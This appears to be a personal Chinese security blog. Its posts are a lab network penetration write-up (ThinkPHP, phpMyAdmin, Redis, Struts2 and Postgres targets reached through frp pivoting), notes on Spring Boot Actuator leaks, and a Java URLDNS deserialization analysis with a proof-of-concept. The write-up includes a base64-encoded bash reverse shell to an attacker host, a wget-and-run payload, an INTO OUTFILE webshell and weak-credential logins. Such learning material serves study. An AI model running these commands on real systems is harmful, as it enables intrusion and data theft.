eth0: flags=4163  mtu 1500
        inet 192.168.100.2  netmask 255.255.255.0  broadcast 192.168.110.255
        ether 02:42:c0:a8:6e:02  txqueuelen 0  (Ethernet)
        RX packets 9369  bytes 10919294 (10.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 6246  bytes 4921635 (4.6 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2465  bytes 2566609 (2.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2465  bytes 2566609 (2.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@74d34925b057:/tmp# ./fscan -h 192.168.110.2/24
start infoscan
(icmp) Target 192.168.100.1   is alive
(icmp) Target 192.168.100.2   is alive
(icmp) Target 192.168.100.3   is alive
[*] Icmp alive hosts len is: 3
192.168.100.2:8080 open
192.168.100.1:8080 open
192.168.100.3:9000 open
192.168.100.3:80 open
192.168.100.1:22 open
[*] alive ports len is: 5
start vulscan
[+] FCGI 192.168.100.3:9000
Status: 403 Forbidden
X-Powered-By: PHP/7.3.33
Content-type: text/html; charset=UTF-8

Access denied.
stderr:Access to the script '/etc/issue' has been denied (see security.limit_extensions)
plesa try other path,as -path /www/wwwroot/index.php
[*] WebTitle http://192.168.100.1:8080 code:302 len:0      title:None 跳转url: http://192.168.100.1:8080/login;jsessionid=A4DC7661A1A9108ACF39363918EEC791
[*] WebTitle http://192.168.100.2:8080 code:302 len:0      title:None 跳转url: http://192.168.100.2:8080/login;jsessionid=64E76231AB0492BF3E940E05FEB02E58
[*] WebTitle http://192.168.100.3      code:200 len:931    title:None
[*] WebTitle http://192.168.100.1:8080/login;jsessionid=A4DC7661A1A9108ACF39363918EEC791 code:200 len:2608   title:Login Page
[*] WebTitle http://192.168.100.2:8080/login;jsessionid=64E76231AB0492BF3E940E05FEB02E58 code:200 len:2608   title:Login Page
[+] PocScan http://192.168.100.1:8080/ poc-yaml-shiro-key [{key kPH+bIxk5D2deZiIxcaaaA==} {mode cbc}]
[+] PocScan http://192.168.100.2:8080/ poc-yaml-shiro-key [{mode cbc} {key kPH+bIxk5D2deZiIxcaaaA==}]
[+] PocScan http://192.168.100.3 poc-yaml-thinkphp5-controller-rce

配置端口转发

192.168.122.102 wsl kali

192.168.100.2 shiro
192.168.100.3 thinkphp

现在的网络环境为

|600

接下来需要配置端口转发了,这个我没啥经验,用我wsl里面装过的frp吧

wsl kali

l1uyun workspace/frp » ./frps -c frps.toml
2024-08-19 09:57:33.478 [I] [frps/root.go:105] frps uses config file: frps.toml       
2024-08-19 09:57:33.613 [I] [server/service.go:237] frps tcp listen on 0.0.0.0:7000
2024-08-19 09:57:33.613 [I] [frps/root.go:114] frps started successfully
2024-08-19 09:59:30.950 [I] [server/service.go:576] [f73e9824ff9889ea] client login info: ip [192.168.122.101:60698] version [0.59.0] hostname [] os [linux] arch [amd64]
2024-08-19 09:59:30.951 [I] [proxy/tcp.go:82] [f73e9824ff9889ea] [shiro] tcp proxy listen port [9999]
2024-08-19 09:59:30.951 [I] [server/control.go:399] [f73e9824ff9889ea] new proxy [shiro] type [tcp] success
2024-08-19 09:59:45.095 [I] [proxy/proxy.go:115] [f73e9824ff9889ea] [shiro] proxy closing

shiro

root@653a3ab3924e:/tmp# ./frpc -c shiro.toml
2024-08-19 01:59:30.648 [I] [sub/root.go:142] start frpc service for config file [shiro.toml]
2024-08-19 01:59:30.648 [I] [client/service.go:294] try to connect to server...
2024-08-19 01:59:30.652 [I] [client/service.go:286] [f73e9824ff9889ea] login to server success, get run id [f73e9824ff9889ea]
2024-08-19 01:59:30.652 [I] [proxy/proxy_manager.go:173] [f73e9824ff9889ea] proxy added: [shiro]
2024-08-19 01:59:30.653 [I] [client/control.go:168] [f73e9824ff9889ea] [shiro] start proxy success

shiro.toml

serverAddr = "192.168.122.102"
serverPort = 7000

[[proxies]]
name = "shiro"
type = "tcp"
localIP = "192.168.110.3"
localPort = 80
remotePort = 9999

thinkphp

|486

网站主页提示了是thinkphp5,直接找到相关工具开始利用

利用

检测漏洞

拿shell

echo 'YmFzaCAtaSA1PD4vZGV2L3RjcC8xOTIuMTY4LjEyMi4xMDIvNDQ0NCAwPiY1IDE+JjUK' |base64 -d > /tmp/a.sh
chmod 777 /tmp/a.sh
ls -al /tmp/a.sh
bash /tmp/a.sh

但是这个shell好像弹不回来..换成php的试试

成功拿到shell

wget 192.168.122.102/ppp -O /tmp/ppp
php /tmp/ppp

..[$] <()> pwncat  -l 4444
id
Linux 94a2babbcac5 6.5.0-13parrot1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.13-1parrot1 (2023-12-19) x86_64 Linux
sh: w: not found
uid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)
/bin/sh: can't access tty; job control turned off
/ $ uid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)
/ $

这里有python3,给shell升级一下

which python python2 python3

python3 -c 'import pty;pty.spawn("/bin/bash")';

export SHELL=bash
export TERM=xterm-256color

Ctrl+Z

stty raw -echo;fg

拿到flag

bash-5.1$ cat /f*
cat /f*
WSS-Studio{ThinkPHP-84d786a4-b47c-4fcb-a377-be6241d5bf10}

内网扫描

可以看到这台thinkphp机器是有两个内网地址的

/ $ ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:C0:A8:64:03  
          inet addr:192.168.100.3  Bcast:192.168.100.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2642 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1810 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2271528 (2.1 MiB)  TX bytes:1569684 (1.4 MiB)

eth1      Link encap:Ethernet  HWaddr 02:42:0A:55:65:04  
          inet addr:10.85.101.4  Bcast:10.85.101.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:14 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1116 (1.0 KiB)  TX bytes:0 (0.0 B)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:6532 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6532 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4014368 (3.8 MiB)  TX bytes:4014368 (3.8 MiB)

上fscan扫一下内网

start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 10.85.101.2     is alive
(icmp) Target 10.85.101.1     is alive
(icmp) Target 10.85.101.4     is alive
(icmp) Target 10.85.101.3     is alive
(icmp) Target 10.85.101.3     is alive
[*] Icmp alive hosts len is: 4
10.85.101.3:80 open
10.85.101.2:6379 open
10.85.101.4:9000 open
10.85.101.3:9000 open
10.85.101.1:22 open
10.85.101.4:80 open
[*] alive ports len is: 6
start vulscan
[+] FCGI 10.85.101.3:9000
Status: 403 Forbidden
X-Powered-By: PHP/8.2.8
Content-type: text/html; charset=UTF-8

Access denied.
[*] WebTitle http://10.85.101.4        code:200 len:931    title:None
[+] FCGI 10.85.101.4:9000
Status: 403 Forbidden
X-Powered-By: PHP/7.3.33
Content-type: text/html; charset=UTF-8

Access denied.
stderr:Access to the script '/etc/issue' has been denied (see security.limit_extensions)
plesa try other path,as -path /www/wwwroot/index.php
[*] WebTitle http://10.85.101.3        code:200 len:19411  title:phpMyAdmin
[+] InfoScan http://10.85.101.3        [phpMyAdmin]
[+] PocScan http://10.85.101.3 poc-yaml-php-cgi-cve-2012-1823
[+] PocScan http://10.85.101.4 poc-yaml-php-cgi-cve-2012-1823
[+] PocScan http://10.85.101.4 poc-yaml-thinkphp5-controller-rce
已完成 6/8 [-] redis 10.85.101.2:6379 sysadmin 
已完成 7/8 [-] ssh 10.85.101.1:22 root !QAZ2wsx ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 7/8 [-] ssh 10.85.101.1:22 root 1q2w3e ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

已完成 7/8 [-] ssh 10.85.101.1:22 admin admin123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 7/8 [-] ssh 10.85.101.1:22 admin 123456~a ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 7/8 [-] ssh 10.85.101.1:22 admin Aa12345. ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 8/8
[*] 扫描结束,耗时: 7m48.941223927s

配置socks代理

我这为啥又出现了一个多的ip….

10.85.101.4 thinkphp
10.85.101.3 phpmyadmin
10.85.101.2 redis
10.85.101.1 ???  是运行docker的parrot???

现在的环境为

这里就直接配置个socks代理吧

serverAddr = "192.168.122.102"
serverPort = 7000

[[proxies]]
name = "kali2tp"
type = "tcp"
remotePort = 9998
[proxies.plugin]
type = "socks5"

配完之后

配置一下proxychains

redis

使用proxychains来实现使用代理

☁  workspace  sudo proxychains4  nmap -sT -Pn 10.85.101.2 -p6379 --script="*redis*"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-19 11:01 CST
[proxychains] Strict chain  ...  192.168.122.102:9998  ...  10.85.101.2:6379  ...  OK
Nmap scan report for 10.85.101.2
Host is up (0.0028s latency).

PORT     STATE SERVICE
6379/tcp open  redis
|_redis-info: ERROR: Script execution failed (use -d to debug)
| redis-brute:
|   Accounts:
|     12345 - Valid credentials
|_  Statistics: Performed 5 guesses in 1 seconds, average tps: 5.0

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds

有个弱口令

└[~/workspace]> sudo proxychains4  redis-cli -h 10.85.101.2 -p 6379 -a 12345
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
[proxychains] Strict chain  ...  192.168.122.102:9998  ...  10.85.101.2:6379  ...  OK
10.85.101.2:6379> PINg
PONG
10.85.101.2:6379> KEYS *
(empty array)
10.85.101.2:6379>

但是为啥是空的….

看了一下巨魔的wp,应该是会有个flag的….应该docker运行的时候出了点问题

phpmyadmin

再看看phpmyadmin

弱口令进入后台

回到phpmyadmin 弱口令进入后台

localhost:root:root

但是我进不去….

重试了几遍,进去了

拿到flag

into-outfile写入webshell

尝试利用,这里去找了一下文章,PHPMyadmin-Mysql的Getshell姿势汇总 – 张三blog 先看看有没有权限写入文件,这里设置为空,没有限制

这俩没啥用,直接猜是/var/www/html试试

写入webshell

select "" into outfile '/var/www/html/shell.php'

获取一个webshell

这个机器好像不出网….尝试了几种payload,都拿不到shell,也不同wget访问我的攻击机.

蚁剑

网上搜了一下,看到有不出网环境下使用蚁剑的例子.

用蚁剑看看

拿到这个flag

使用蚁剑的终端,来尝试反弹shell,但是还是不行,这好像是个不出网的环境…

不过蚁剑带的文件上传功能能用

内网扫描

(root:/tmp) $ ip a
1: lo:  mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
53: eth0@if54:  mtu 1500 qdisc noqueue state UP 
    link/ether 02:42:0a:55:65:03 brd ff:ff:ff:ff:ff:ff
    inet 10.85.101.3/24 brd 10.85.101.255 scope global eth0
       valid_lft forever preferred_lft forever
57: eth1@if58:  mtu 1500 qdisc noqueue state UP 
    link/ether 02:42:ac:38:66:04 brd ff:ff:ff:ff:ff:ff
    inet 172.56.102.4/24 brd 172.56.102.255 scope global eth1
       valid_lft forever preferred_lft forever

执行fscan之后,没有回显,但是有输出文件

跟之前一样,多了一个172.56.102.1,这到底是啥???🤔,大概率就是我运行docker的parrot机器了

172.56.102.1:22 open
172.56.102.4:80 open
172.56.102.2:8080 open
172.56.102.3:5432 open
172.56.102.4:9000 open
172.56.102.2:8009 open
[+] FCGI 172.56.102.4:9000 
Status: 403 Forbidden
X-Powered-By: PHP/8.2.8
Content-type: text/html; charset=UTF-8

Access denied.

[*] WebTitle http://172.56.102.4       code:200 len:19411  title:phpMyAdmin
[+] Postgres:172.56.102.3:5432:postgres password
[+] InfoScan http://172.56.102.4       [phpMyAdmin] 
[*] WebTitle http://172.56.102.2:8080  code:200 len:90     title:$Title$
[+] PocScan http://172.56.102.2:8080 poc-yaml-struts2_045 poc1

二重内网环境配置代理

172.56.102.4   phpmyadmin
172.56.102.3   Postgres
172.56.102.2   struts2

这里直接拿巨魔的拓扑图

我现在需要再配置一个socks代理,服务器放在thinkphp机器上,客户端放在phpmyadmin机器上

phpmyadmin.toml

serverAddr = "10.85.101.4"
serverPort = 7000

[[proxies]]
name = "tp2php"
type = "tcp"
remotePort = 9998
[proxies.plugin]
type = "socks5"

然后在proxychains里面配置两个代理

socks5 192.168.122.102 9998
socks5 10.85.101.4 9998
或者
socks5 127.0.0.1 9998
socks5 127.0.0.1 9998

然后nmap扫一下,检查一下代理是否成功.

☁  workspace  sudo proxychains nmap -Pn -sT -T4 172.56.102.2 -p8080
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-19 12:21 CST
[proxychains] Strict chain  ...  127.0.0.1:9998  ...  127.0.0.1:9998  ...  172.56.102.2:8080  ...  OK
Nmap scan report for 172.56.102.2
Host is up (0.0058s latency).

PORT     STATE SERVICE
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 1.89 seconds

代理成功了,接下来需要在Windows上面也使用多重代理,这时候要上proxifier了.

配置完之后,成功访问Struts服务器.

Struts

漏洞存在

执行命令

获取flag

Postgres

之前fscan扫出来的弱口令 [+] Postgres:172.56.102.3:5432:postgres password

登录之后获取flag

☁  workspace  sudo proxychains psql -h 172.56.102.3 -p 5432 -U postgres
[sudo] password for l1uyun: 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:9998  ...  127.0.0.1:9998  ...  172.56.102.3:5432  ...  OK
Password for user postgres: 
[proxychains] Strict chain  ...  127.0.0.1:9998  ...  127.0.0.1:9998  ...  172.56.102.3:5432  ...  OK
psql (16.3 (Debian 16.3-1), server 16.4)
Type "help" for help.

postgres=# help
You are using psql, the command-line interface to PostgreSQL.
Type:  \copyright for distribution terms
       \h for help with SQL commands
       \? for help with psql commands
       \g or terminate with semicolon to execute query
       \q to quit
postgres=# \dt
Did not find any relations.
postgres=# \l
                                                      List of databases
   Name    |  Owner   | Encoding | Locale Provider |  Collate   |   Ctype    | ICU Locale | ICU Rules |   Access privileges   
-----------+----------+----------+-----------------+------------+------------+------------+-----------+-----------------------
 flag      | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | 
 postgres  | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | 
 template0 | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | =c/postgres          +
           |          |          |                 |            |            |            |           | postgres=CTc/postgres
 template1 | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | =c/postgres          +
           |          |          |                 |            |            |            |           | postgres=CTc/postgres
(4 rows)

postgres=# \c flag
[proxychains] Strict chain  ...  127.0.0.1:9998  ...  127.0.0.1:9998  ...  172.56.102.3:5432  ...  OK
psql (16.3 (Debian 16.3-1), server 16.4)
You are now connected to database "flag" as user "postgres".
flag=# \dt
        List of relations
 Schema | Name | Type  |  Owner
--------+------+-------+----------
 public | flag | table | postgres
(1 row)

flag=# SELECT * FROM FLAG;
                            data
-------------------------------------------------------------
 WSS-Studio{Postgresql-cb6cba4a-6d7b-43b6-bfc4-0146b0d0e5af}
(1 row)

links

Puff-Pastry | Target Machines WriteUp

FRP内网穿透及多级代理的使用

springboot利用

2024-08-06T09:32:00+08:00

springboot利用

前置知识

SpringBoot Actuator

Spring Boot Actuator 1.x 版本默认内置路由的起始路径为 / ，2.x 版本则统一以 /actuator 为起始路径
Spring Boot Actuator 默认的内置路由名字，如 /env 有时候也会被程序员修改，比如修改成 /appenv

一般来讲，暴露出 spring boot 应用的相关接口和传参信息并不能算是漏洞，但是以 “默认安全” 来讲，不暴露出这些信息更加安全。

对于攻击者来讲，一般会仔细审计暴露出的接口以增加对业务系统的了解，并会同时检查应用系统是否存在未授权访问、越权等其他业务类型漏洞。

配置不当而暴露的路由

主要是因为程序员开发时没有意识到暴露路由可能会造成安全风险，或者没有按照标准流程开发，忘记上线时需要修改/切换生产环境的配置

因为配置不当而暴露的默认内置路由可能会有：

/actuator
/auditevents
/autoconfig
/beans
/caches
/conditions
/configprops
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/intergrationgraph
/jolokia
/logfile
/loggers
/liquibase
/metrics
/mappings
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream

其中对寻找漏洞比较重要接口的有：

/env、/actuator/env GET 请求 /env 会直接泄露环境变量、内网地址、配置中的用户名等信息；当程序员的属性名命名不规范，例如 password 写成 psasword、pwd 时，会泄露密码明文；

同时有一定概率可以通过 POST 请求 /env 接口设置一些属性，间接触发相关 RCE 漏洞；同时有概率获得星号遮掩的密码、密钥等重要隐私信息的明文。

/refresh、/actuator/refresh POST 请求 /env 接口设置属性后，可同时配合 POST 请求 /refresh 接口刷新属性变量来触发相关 RCE 漏洞。

/restart、/actuator/restart 暴露出此接口的情况较少；可以配合 POST请求 /env 接口设置属性后，再 POST 请求 /restart 接口重启应用来触发相关 RCE 漏洞。

/jolokia、/actuator/jolokia 可以通过 /jolokia/list 接口寻找可以利用的 MBean，间接触发相关 RCE 漏洞、获得星号遮掩的重要隐私信息的明文等。

/trace、/actuator/httptrace 一些 http 请求包访问跟踪信息，有可能在其中发现内网应用系统的一些请求信息详情；以及有效用户或管理员的 cookie、jwt token 等信息。

漏洞检测

检测清单

https://github.com/LandGrey/SpringBootVulExploit

黑盒发现

人工识别，BP插件

人工识别 1、网站图片文件是一个绿色的树叶。2、特有的报错信息。3、Whitelabel Error Page关键字

|750

BP插件 https://github.com/API-Security/APIKit 打开BurpSuite页面,点击Extender然后选择Extensions,添加APIKit.jar

安装好插件后啥都不用管，让数据包经过BP即可触发插件被动扫描

|800

白盒发现

pom.xml,引用库


    org.springframework.boot
    spring-boot-starter-actuator

配置文件Actuator设置全部暴露management.endpoints.web.exposure.include=*

信息泄露利用

内部路由泄露

https://github.com/AabyssZG/SpringBoot-Scan

heapdump敏感信息查询

配置密码，AK/SK等

|800

下载下来

然后使用JDumpSPider工具来获取数据

![](https://img.l1uyun.one/Pasted image 20240806101506.png)

这里还有另外一款工具,支持关键词搜索 https://github.com/wyzxxz/heapdump_tool

|750

|850

漏洞利用

框架漏洞

https://github.com/AabyssZG/SpringBoot-Scan

利用类漏洞来进行RCE攻击

服务器上执行JNDIExploit工具(可以本地、也可以远程VPS上运行)

CMS源码审计

安装源码

起始就是把actuator的接口做了可视化

源码审计

从pom.xml看有没有调用Actuator库

配置文件中Actuator设置是否为*(全部暴露)
management.endpoints.web.exposure.include=*

|700

泄露安全(heapdump)

使用heapdump敏感信息查询工具提取敏感信息 JDumpSpider

|750

一句话总结

遇到springboot框架从两个方面去寻找安全问题： 1.泄露安全(是否泄露了内部路由及heapdump) 2.漏洞安全(利用相关框架漏洞检测工具测试是否存在漏洞)

参考

WEB攻防-Java安全&原生反序列化&SpringBoot攻防&heapdump提取&CVE_java spring反序列化-CSDN博客

javasec-urldns链

2024-08-03T15:51:23+08:00

urldns链

URLDNS 是ysoserial中⼀个利⽤链的名字，但准确来说，这个其实不能称作“利⽤链”。因为其参数不是⼀个可以“利⽤”的命令，⽽仅为⼀个URL，其能触发的结果也不是命令执⾏，⽽是⼀次DNS请求。

虽然这个“利⽤链”实际上是不能“利⽤”的，但因为其如下的优点，⾮常适合我们在检测反序列化漏洞时使⽤

使⽤Java内置的类构造，对第三⽅库没有依赖,因此对java版本没有限制
在⽬标没有回显的时候，能够通过DNS请求得知是否存在反序列化漏洞

前置知识

gadget

Java反序列化漏洞产生漏洞的形式大致有两种,

一种是上下文入口类的readObject方法中直接包含了危险操作(危险函数)且传入危险函数的参数可控(这种情况很少)
还有一种情况就是入口类的readObject方法中间接调用了其它类(B类),在B类中又调用了恶意的方法或调用了其它包含恶意方法的类,这种链式触发命令执行的结构被称为反序列化利用链,组成这种链式结构中的"成员类"被称为Gadget而这种链式结构被称为Gadget Chain,通过构造Gadget Chain可以进行反序列化攻击。

漏洞分析

ysoserial里是这样生成payload的

public Object getObject(final String url) throws Exception {
             //Avoid DNS resolution during payload creation
             //Since the field java.net.URL.handler is transient, it will not be part of the serialized payload.
             URLStreamHandler handler = new SilentURLStreamHandler();

             HashMap ht = new HashMap(); // HashMap that will contain the URL
             URL u = new URL(null, url, handler); // URL to use as the Key
             ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

             Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.

             return ht;
     }
     
     static class SilentURLStreamHandler extends URLStreamHandler {
     protected URLConnection openConnection(URL u) throws IOException {
         return null;
     }
     protected synchronized InetAddress getHostAddress(URL u) {
         return null;
     }
 }

利用链

Gadget Chain:
  HashMap.readObject()
    HashMap.putVal()
      HashMap.hash()
        URL.hashCode()

urldns是yso中较为简单的一个gadget，所以这里可以直接通过正向分析的方式进行分析

看到 URLDNS 类的 getObject ⽅法，ysoserial会调⽤这个⽅法获得Payload。这个⽅法返回的是⼀个对象，这个对象就是最后将被序列化的对象，在这⾥是 HashMap。因为触发反序列化的⽅法是 readObject,那么可以直奔 HashMap 类的 readObject ⽅法：

HashMap#readObject

private void readObject(java.io.ObjectInputStream s)
        throws IOException, ClassNotFoundException {
        // Read in the threshold (ignored), loadfactor, and any hidden stuff
        s.defaultReadObject();
        reinitialize();
        if (loadFactor <= 0 || Float.isNaN(loadFactor))
            throw new InvalidObjectException("Illegal load factor: " +
                                             loadFactor);
        s.readInt();                // Read and ignore number of buckets
        int mappings = s.readInt(); // Read number of mappings (size)
        if (mappings < 0)
            throw new InvalidObjectException("Illegal mappings count: " +
                                             mappings);
        else if (mappings > 0) { // (if zero, use defaults)
            // Size the table using given load factor only if within
            // range of 0.25...4.0
            float lf = Math.min(Math.max(0.25f, loadFactor), 4.0f);
            float fc = (float)mappings / lf + 1.0f;
            int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ?
                       DEFAULT_INITIAL_CAPACITY :
                       (fc >= MAXIMUM_CAPACITY) ?
                       MAXIMUM_CAPACITY :
                       tableSizeFor((int)fc));
            float ft = (float)cap * lf;
            threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ?
                         (int)ft : Integer.MAX_VALUE);
            @SuppressWarnings({"rawtypes","unchecked"})
                Node<K,V>[] tab = (Node<K,V>[])new Node[cap];
            table = tab;

            // Read the keys and values, and put the mappings in the HashMap
            for (int i = 0; i < mappings; i++) {
                @SuppressWarnings("unchecked")
                    K key = (K) s.readObject();
                @SuppressWarnings("unchecked")
                    V value = (V) s.readObject();
                putVal(hash(key), key, value, false, false);
            }
        }
    }

putVal这一段，这里调用了hash方法来处理key，跟进hash方法：

static final int hash(Object key) {
       int h;
       return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
   }

这里又调用了key.hashCode方法,这里的key是一个URL对象,让我们看看URL的hashCode方法：

URL#hashCode：

public synchronized int hashCode() {
        if (hashCode != -1)
            return hashCode;

        hashCode = handler.hashCode(this);
        return hashCode;
    }

在URL类的hashCode方法中，又调用了URLStreamHandler#hashCode，并将自身传递进去：

URLStreamHandler#hashCode

protected int hashCode(URL u) {
        int h = 0;

        // Generate the protocol part.
        String protocol = u.getProtocol();
        if (protocol != null)
            h += protocol.hashCode();

        // Generate the host part.
        InetAddress addr = getHostAddress(u);

getHostAddress，正是这步触发了dns请求：

protected synchronized InetAddress getHostAddress(URL u) {

    if (u.hostAddress != null) {
        return u.hostAddress;
    }
    String host = u.getHost();
    if (host == null || host.equals("")) {
        return null;
    } else {
        try {
            u.hostAddress = InetAddress.getByName(host);
        } catch (UnknownHostException ex) {
            return null;
        } catch (SecurityException se) {
            return null;
        }
    }
    return u.hostAddress;
}

这⾥ InetAddress.getByName(host) 的作⽤是根据主机名，获取其IP地址，在⽹络上其实就是⼀次 DNS查询。

可以理解为,在序列化 HashMap 类的对象时, 为了减小序列化后的大小, 并没有将整个哈希表保存进去, 而是仅仅保存了所有内部存储的 key 和 value. 所以在反序列化时, 需要重新计算所有 key 的 hash, 然后与 value 一起放入哈希表中. 而恰好, URL这个对象计算 hash 的过程中用了 getHostAddress 查询了 URL 的主机地址, 自然需要发出 DNS 请求.

这里存在一个问题,当我们生成payload的时候,也会存在计算哈希的过程,我们需要避免这个操作,

回到第一步：HashMap#readObject

key是使用readObject取出来的，也就是说在writeObject一定会写入key

private void writeObject(java.io.ObjectOutputStream s)
        throws IOException {
        int buckets = capacity();
        // Write out the threshold, loadfactor, and any hidden stuff
        s.defaultWriteObject();
        s.writeInt(buckets);
        s.writeInt(size);
        internalWriteEntries(s);
    }

跟入internalWriteEntries

void internalWriteEntries(java.io.ObjectOutputStream s) throws IOException {
        Node<K,V>[] tab;
        if (size > 0 && (tab = table) != null) {
            for (int i = 0; i < tab.length; ++i) {
                for (Node<K,V> e = tab[i]; e != null; e = e.next) {
                    s.writeObject(e.key);
                    s.writeObject(e.value);
                }
            }
        }
    }

这里的key以及value是从tab中取的，而tab的值即HashMap中table的值。

此时我们如果想要修改table的值，就需要调用HashMap#put方法，而HashMap#put方法中也会对key调用一次hash方法，所以在这里就会产生第一次dns查询

    public V put(K key, V value) {
        return putVal(hash(key), key, value, false, true);
    }

即

import java.util.HashMap;
import java.net.URL;

public class Test {

    public static void main(String[] args) throws Exception {
        HashMap map = new HashMap();
        URL url = new URL("http://xrgsnqezso.yutu.eu.org");
        map.put(url,123); //此时会产生dns查询
    }

只想判断payload在对方机器上是否成功触发，那就应该避免掉这一次dns查询以及多余的操作，回到URL#hashCode：

public synchronized int hashCode() {
      if (hashCode != -1)
          return hashCode;

      hashCode = handler.hashCode(this);
      return hashCode;
  }

这里会先判断hashCode是否为-1，如果不为-1则直接返回hashCode，也就是说我们只要在put前修改URL的hashCode为其他任意值，就可以在put时不触发dns查询。(hashCode默认值为-1)

这里的hashCode是private修饰的，所以我们需要通过反射来修改其值

    public static void main(String[] args) throws Exception {
        HashMap map = new HashMap();
        URL url = new URL("http://xrgsnqezso.yutu.eu.org");
        Field f = Class.forName("java.net.URL").getDeclaredField("hashCode");
        f.setAccessible(true); //修改访问权限
        f.set(url,123); //设置hashCode值为123，这里可以是任何不为-1的数字
        System.out.println(url.hashCode()); // 获取hashCode的值，验证是否修改成功
        map.put(url,123); //调用map.put 此时将不会再触发dns查询
    }

此时输出url的hashCode为123，证明修改成功。

当put完毕之后再将url的hashCode修改为-1，确保在反序列化调用hashCode方法时能够正常进行，下面是完整的POC

#URLDNS.java

import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;
public class URLDNS {
    public static void main(String[] args) throws Exception {
        HashMap<URL, String> hashMap = new HashMap<URL, String>();
        URL url = new URL("http://xxxx.xxx.xxx");
        Field f = Class.forName("java.net.URL").getDeclaredField("hashCode");
        f.setAccessible(true);
        f.set(url, 0xdeadbeef); // 设一个值, 这样 put 的时候就不会去查询 DNS
        hashMap.put(url, "rmb122");
        f.set(url, -1); // hashCode 这个属性不是 transient 的, 所以放进去后设回 -1, 这样在反序列化时就会重新计算 hashCode
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("out.bin"));
        oos.writeObject(hashMap);
    }
}

#Test.java
import java.io.FileInputStream;
import java.io.ObjectInputStream;
public class Test {
    public static void main(String[] args) throws Exception {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("out.bin"));
        ois.readObject();
    }
}

回过头来看看yso的payload

yso在创建URL对象时使用了三个参数的构造方法。yso用了子类继承父类的方式规避了dns查询的风险，其创建了一个内部类：

static class SilentURLStreamHandler extends URLStreamHandler {

        protected URLConnection openConnection(URL u) throws IOException {
            return null;
        }

        protected synchronized InetAddress getHostAddress(URL u) {
            return null;
        }
    }

定义了一个URLConnection和getHostAddress方法，当调用put方法走到getHostAddress方法后，会调用SilentURLStreamHandler的getHostAddress而非URLStreamHandler的getHostAddress，这里直接return null了，所以自然也就不会产生dns查询。

参考

urldns | Hack the world

xz.aliyun.com/t/13060

l1uyun's Blog

